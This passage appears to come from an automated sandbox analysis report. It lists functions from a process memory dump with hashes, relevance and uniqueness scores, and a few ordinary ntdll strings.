                                                                                                                    Function 00B13540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: BinaryHash
                                                                                                                    • API String ID: 0-2202222882
                                                                                                                    • Opcode ID: 8fd8c2b03b73fa8458af19e3e66d1d9feabe5d30ae8992798e10984242e5eb12
                                                                                                                    • Instruction ID: 2b293d70628d646d8f4d0239600cd3d5ac3d3c5c456bd849b8cecf5e4ea894e7
                                                                                                                    • Opcode Fuzzy Hash: 8fd8c2b03b73fa8458af19e3e66d1d9feabe5d30ae8992798e10984242e5eb12
                                                                                                                    • Instruction Fuzzy Hash: 7D4143F1D0452CAADF21DA50DD81FDEB7BCAB44B14F4045E5EA09AB241EB309F888F94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B605AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 0-2679148245
                                                                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                    • Instruction ID: 7bf49f8c2bcae282472c6b07c45f8a5d8b51cff9e323bef65292928ffc971912
                                                                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                    • Instruction Fuzzy Hash: 813122322003056BE720EE26CD85F9B77D9EBC4754F0482A9FA58AB2C0D774ED14CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B13884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: BinaryName
                                                                                                                    • API String ID: 0-215506332
                                                                                                                    • Opcode ID: 7c557efb3140dbf5451cc79dabdee2760df79692b36c2928d408d5e530df2e2b
                                                                                                                    • Instruction ID: 2b48cc7bc7f75fa56d4301af775b02485f969c4de6ccde620c960ef9e4089905
                                                                                                                    • Opcode Fuzzy Hash: 7c557efb3140dbf5451cc79dabdee2760df79692b36c2928d408d5e530df2e2b
                                                                                                                    • Instruction Fuzzy Hash: B731F472900519AFDB15DB58C945DABB7F4EB80B60F1181A9B806A7241E770DF80C7A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ACD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: 8ce62aa8ffaf4e6c9bce52290252ecab10a7db51246a6379781c4498778c0294
                                                                                                                    • Instruction ID: 3c3ffb75a255edceebfdc2a073481dedcf988ef2120f9d090965333fb96bf51a
                                                                                                                    • Opcode Fuzzy Hash: 8ce62aa8ffaf4e6c9bce52290252ecab10a7db51246a6379781c4498778c0294
                                                                                                                    • Instruction Fuzzy Hash: 4B3198B55083819FC311DF28C981EABBBE8EB89754F01092EB89597311EB34DD04DB93
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AA1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: WindowsExcludedProcs
                                                                                                                    • API String ID: 0-3583428290
                                                                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                    • Instruction ID: 751ab085b59a690e6c717451c0cd5bb272c5ccea68b4d45f5bf87398b9768a23
                                                                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                    • Instruction Fuzzy Hash: 9121C577541228BBCB219F99C940FAFB7BDAF56B60F154426F9059B240DB34DD0097A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ABF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Actx
                                                                                                                    • API String ID: 0-89312691
                                                                                                                    • Opcode ID: f8442add10ac6c8f72dc39089ee3d1f7175282a57d1d08f9b14687f867fa728d
                                                                                                                    • Instruction ID: b9241b4dfb7ea6a6d6a09c561e6810702b3fbffc7610f4be08c3ca0425a7376b
                                                                                                                    • Opcode Fuzzy Hash: f8442add10ac6c8f72dc39089ee3d1f7175282a57d1d08f9b14687f867fa728d
                                                                                                                    • Instruction Fuzzy Hash: 18117C357046429FEB244E1D8C906A676ADEB96724F3C45BAE865CB393DF60CC818380
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B48DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Critical error detected %lx, xrefs: 00B48E21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Critical error detected %lx
                                                                                                                    • API String ID: 0-802127002
                                                                                                                    • Opcode ID: da3ae473951d429b2e534ea00dd89ad15f47be10c7a459b878a9dd08639be837
                                                                                                                    • Instruction ID: abf6c0ea8aa024a64aba8df927202cb2358a207ec5031c01e7e95d103f4ca0cc
                                                                                                                    • Opcode Fuzzy Hash: da3ae473951d429b2e534ea00dd89ad15f47be10c7a459b878a9dd08639be837
                                                                                                                    • Instruction Fuzzy Hash: 42115B71D54348EADF24DFA585067ACBBF0FB04714F24429EE429AB292C7744A01DF14
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00B2FF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                    • API String ID: 0-1911121157
                                                                                                                    • Opcode ID: 9d0f22e14709a37786f1ed84ba277bb8afdb48d8f3a4b6583c51b553dd414c93
                                                                                                                    • Instruction ID: c119fd63de26ebc17d974186018b4af365c7dbcec6a492f7c713524dda72653a
                                                                                                                    • Opcode Fuzzy Hash: 9d0f22e14709a37786f1ed84ba277bb8afdb48d8f3a4b6583c51b553dd414c93
                                                                                                                    • Instruction Fuzzy Hash: F511AD71951594EFDB22EB50DA49FA8BBF1FB08704F1580A4F509AB2B2CB399940CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B65BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9da4f0b7c17a8279333ceadef92737ab48c8afd088a1fe3e3a5f98cbced8bee0
                                                                                                                    • Instruction ID: 13232c11880ca82ee16dc661757b0568d61ad5af0c31add03bb6f826a9f0d4e1
                                                                                                                    • Opcode Fuzzy Hash: 9da4f0b7c17a8279333ceadef92737ab48c8afd088a1fe3e3a5f98cbced8bee0
                                                                                                                    • Instruction Fuzzy Hash: 124247759006298FDB24CF68C881BA9B7F1FF49304F1481EAD94DAB342E7399A85CF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AB4120, Relevance: .4, Instructions: 444COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f2b3f8e2efd24a0ee4ab0f922266c7c358dbdf025e815d42179cc72608f94cb4
                                                                                                                    • Instruction ID: 5d284dce7cfa0702558d9403be1c4d1e6c8bae0d6a4fab5ffa7ecbaa91353566
                                                                                                                    • Opcode Fuzzy Hash: f2b3f8e2efd24a0ee4ab0f922266c7c358dbdf025e815d42179cc72608f94cb4
                                                                                                                    • Instruction Fuzzy Hash: 85F15B706082518FC724CF59C480ABAB7F5BF98714F144A2EF586CB2A2E734DC95DB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC20A0, Relevance: .4, Instructions: 420COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d80b905fc9de15ff771a9133ae1b811e1e99482ef4e5c3c52695f90a01cca970
                                                                                                                    • Instruction ID: dd13af200cadc210a14bfdd496d4386e426391c770bcd84d91f7cfa3015621cc
                                                                                                                    • Opcode Fuzzy Hash: d80b905fc9de15ff771a9133ae1b811e1e99482ef4e5c3c52695f90a01cca970
                                                                                                                    • Instruction Fuzzy Hash: 93F10031A087419FDB35CB28C840B6B7BE5EF95324F1A866DE8999B390D734DC40CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AA849B, Relevance: .3, Instructions: 290COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4f1240401d3126829e02b12fbe80cb0d93e3bcb6e20d12468b22030cb7ed17a5
                                                                                                                    • Instruction ID: 5049abbb0641ea88613cd92f07a46a781e516f66e8d8ef4cc64ca97063a7a8f9
                                                                                                                    • Opcode Fuzzy Hash: 4f1240401d3126829e02b12fbe80cb0d93e3bcb6e20d12468b22030cb7ed17a5
                                                                                                                    • Instruction Fuzzy Hash: FBB15D70E04249DFDB14DFD9C984AAEBBB9FF49304F20412AE505AB396DB74AD41CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC513A, Relevance: .3, Instructions: 258COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5185f61507fe4baf0e8b443139626b7797727fe59bbe1748e07a9dd809f9088e
                                                                                                                    • Instruction ID: c8dd42b277ce6473c77c6869621b3cbd552901e4868bfc3fdf94ec954c97f59f
                                                                                                                    • Opcode Fuzzy Hash: 5185f61507fe4baf0e8b443139626b7797727fe59bbe1748e07a9dd809f9088e
                                                                                                                    • Instruction Fuzzy Hash: CBC1F1755097818FD354CF28C580A5AFBF1BF88304F184AAEF8998B392D771E985CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC03E2, Relevance: .3, Instructions: 254COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e5c861fcdae5183e200d9846617352da8158e24fcdb24042d1371b32fae0ae2a
                                                                                                                    • Instruction ID: 97dfb72a0f0b218ceb040acb750b7843920804a62b0add211936ecfe22a1a7e5
                                                                                                                    • Opcode Fuzzy Hash: e5c861fcdae5183e200d9846617352da8158e24fcdb24042d1371b32fae0ae2a
                                                                                                                    • Instruction Fuzzy Hash: C0914971E00218EFEB359B68CD45FAE7BE4EB01714F1642A9FA11A72E1DB749D40CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A9C600, Relevance: .2, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f780f52a2d26812054c5c690b90d9a59ae43311b36fe7d2fc1bf6f685d420201
                                                                                                                    • Instruction ID: 3d17b59a7f23007e6d2338477411d04a6c39aa0fb399fa4bafe1bfbbd4cc8caa
                                                                                                                    • Opcode Fuzzy Hash: f780f52a2d26812054c5c690b90d9a59ae43311b36fe7d2fc1bf6f685d420201
                                                                                                                    • Instruction Fuzzy Hash: E8819475A886059BCB25CE14C891B6FFBE5FB84350F2444AAFD469B281DB30FD41C7A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6b53bf61db807f99b6f1e0da92b68af289149a7123ea337a0590a9a2311bfa97
                                                                                                                    • Instruction ID: 7ca7390788008234d1271ca193a729c89774d6421c4f5bda93d78a52d186259b
                                                                                                                    • Opcode Fuzzy Hash: 6b53bf61db807f99b6f1e0da92b68af289149a7123ea337a0590a9a2311bfa97
                                                                                                                    • Instruction Fuzzy Hash: 47711032200B11AFDB31CF24E985F66B7E5EF44720F244968E65A8B2A1DF71E980CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B16DC9, Relevance: .2, Instructions: 199COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                    • Instruction ID: 8e0fd55c1a56ce47a8555c21f7b5e2a6b1bb2be8092a8b5ed9621e2bdf6972d9
                                                                                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                    • Instruction Fuzzy Hash: 98716C71A00219AFCB10DFA5C985AEEBBF9FF48710F1045A9E505E7252DB34EA81CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC2AE4, Relevance: .2, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bedd8a67270fce4f4fce97063326da6f0d03e176dbeb629c132a402e023e546d
                                                                                                                    • Instruction ID: 7e5f705797d0c28fa84e7486f3d56472f04693bb730c7dbba5d8187635aeec3e
                                                                                                                    • Opcode Fuzzy Hash: bedd8a67270fce4f4fce97063326da6f0d03e176dbeb629c132a402e023e546d
                                                                                                                    • Instruction Fuzzy Hash: C8519F7AB001158FCB18DF1DC890BBDB7B1FB88700716856EE856AB364DB30AE51DB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ABDBE9, Relevance: .1, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 74c777b8bc466d3c4ae098bd8859f9816deec4d66a00a8d4033ac155eac838c9
                                                                                                                    • Instruction ID: c4e7522f4a371c9c53a2560dc56971b9603559d61530b86912b46a314e031560
                                                                                                                    • Opcode Fuzzy Hash: 74c777b8bc466d3c4ae098bd8859f9816deec4d66a00a8d4033ac155eac838c9
                                                                                                                    • Instruction Fuzzy Hash: 6B519E71A01605DFCB14CFA8C590AEEBBF9BF49310F20855AD595AB342EB71AD44CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AAEF40, Relevance: .1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                    • Instruction ID: db1c3a907839e0deabc42a77b7d8cf6b983f3d9b73542201869f43652ed221d5
                                                                                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                    • Instruction Fuzzy Hash: 7E51F330A04249DFDB28CBA8C1D07AEBBB1EF16314F2881B9D545972C2D376AD89D751
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6740D, Relevance: .1, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                    • Instruction ID: 397be53597850578adf0af060a8f3c2e38324c6fc83e5a41df663214f9bd31b5
                                                                                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                    • Instruction Fuzzy Hash: CA51AA71640606EFDB15CF14C580A96BBF5FF55308F1481FAE8099F222EB71E946CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC2990, Relevance: .1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9071f2ee8a0c7251ccbe51f321803d35f598142a9af94a3e4440d5485a7c5f60
                                                                                                                    • Instruction ID: 4177cd73c9e86915dedd70bb9320f6477f141114188f74f815c539c466382e8c
                                                                                                                    • Opcode Fuzzy Hash: 9071f2ee8a0c7251ccbe51f321803d35f598142a9af94a3e4440d5485a7c5f60
                                                                                                                    • Instruction Fuzzy Hash: 8E514371A00209AFDF25DF59C980FDEBBB1FB48350F168059E815AB260C3719D52DF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC4D3B, Relevance: .1, Instructions: 131COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f74b004c182a1ee3f822987650ff410d511bbcbeca0761436110516933932f91
                                                                                                                    • Instruction ID: 9cfccd9830a4376a5b58d56f3ffadeb5a9b2d9019f22c9a6602aba4c427d4beb
                                                                                                                    • Opcode Fuzzy Hash: f74b004c182a1ee3f822987650ff410d511bbcbeca0761436110516933932f91
                                                                                                                    • Instruction Fuzzy Hash: EC41B271A40318AFEB31DF14CD91FAABBA9FB48710F06409EE8469B291DB74DD40CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AC4BAD, Relevance: .1, Instructions: 131COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d480ebce8449740772204baf49c1fe49493b358f213b72e4cfc210eed02b2660
                                                                                                                    • Instruction ID: ddde2d51ce5ebde77b829bf6181f3c6246f832dd3b7c8d4ecaed1940c7676650
                                                                                                                    • Opcode Fuzzy Hash: d480ebce8449740772204baf49c1fe49493b358f213b72e4cfc210eed02b2660
                                                                                                                    • Instruction Fuzzy Hash: 0841B335A052289FCB21DF68C941FEE77F8EF49710F0100A9E909AB291DB74DE84CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AA8A0A, Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9f72c007e3bb15d02d6281de395a7cfcd429ac3fe6bec6f31f41865ed1ae77d3
                                                                                                                    • Instruction ID: 3d462fb77698585d141848501045d93da4178fc69a000f49d4ceabcec96a7163
                                                                                                                    • Opcode Fuzzy Hash: 9f72c007e3bb15d02d6281de395a7cfcd429ac3fe6bec6f31f41865ed1ae77d3
                                                                                                                    • Instruction Fuzzy Hash: B34174B1A0132C9BDB24DF55CC88BA9B7F4FB55340F1145EAE81997292EB749E80CF60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B169A6, Relevance: .1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 21ff259a9e5eaa0f701193fced7c205125078cec94a60752e4990a78f06f7253
                                                                                                                    • Instruction ID: 75e6b58585c4307d76dd9b9ff4610e35e16cb034b84fe3312c440ae4b0a08e2c
                                                                                                                    • Opcode Fuzzy Hash: 21ff259a9e5eaa0f701193fced7c205125078cec94a60752e4990a78f06f7253
                                                                                                                    • Instruction Fuzzy Hash: D241BEB1D00208AFDB24DFA4D941BFEBBF8FF48714F14816AE814A72A1EB709945CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A95210, Relevance: .1, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e48601523b5bcfa07229b4d4f8350f09eaed12b9a26be918928bb21c37cd63a7
                                                                                                                    • Instruction ID: 6483142b3c92b2880432813dd8b54bd654cd32c0361c42b699f08f3c9ebedb32
                                                                                                                    • Opcode Fuzzy Hash: e48601523b5bcfa07229b4d4f8350f09eaed12b9a26be918928bb21c37cd63a7
                                                                                                                    • Instruction Fuzzy Hash: 7D310831741A04EBCB26ABA8C952FB677B5FF50760F21462AF5164B1E2DB70EC00C790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD3D43, Relevance: .1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd29b56bdf12a3ad40a26b543faaf431f438bb002081ab30091ace4cbecc2f3b
                                                                                                                    • Instruction ID: 82aa72296943842a9dac9393cbea3a43764f9e0e7e5ad14d72f49d8a9118703f
                                                                                                                    • Opcode Fuzzy Hash: cd29b56bdf12a3ad40a26b543faaf431f438bb002081ab30091ace4cbecc2f3b
                                                                                                                    • Instruction Fuzzy Hash: DE31A472605615DBCB258F29C841A7BBBF5EF55700B1588AFE486CB390EB30DD40DB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ACA61C, Relevance: .1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 575967c23c29871796f98f5a9ae9845ac63a8ef525f5abfaa615523776a1c2a3
                                                                                                                    • Instruction ID: 8b51afaa7f2c46d5623b8bbbd503602d2c3b3666646a75cbfc7e031c45ae91c4
                                                                                                                    • Opcode Fuzzy Hash: 575967c23c29871796f98f5a9ae9845ac63a8ef525f5abfaa615523776a1c2a3
                                                                                                                    • Instruction Fuzzy Hash: 2E418A75A00209DFCB14CF58D890BA9BBF2FB59318F2980ADE815EB391D774AD01CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B17016, Relevance: .1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ba059e6d274181da5227086bf9880cebb01ca6d036b7636008f21c045a3d60a
                                                                                                                    • Instruction ID: 5c7e9c3b2b9c4790c4302048902705e76d36c4d4e016a8e74477aea434cdb56b
                                                                                                                    • Opcode Fuzzy Hash: 3ba059e6d274181da5227086bf9880cebb01ca6d036b7636008f21c045a3d60a
                                                                                                                    • Instruction Fuzzy Hash: A731B372608751ABC320DF28C941AABB3F9FFC8700F444A69F89597791EB30E954C7A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ABC182, Relevance: .1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
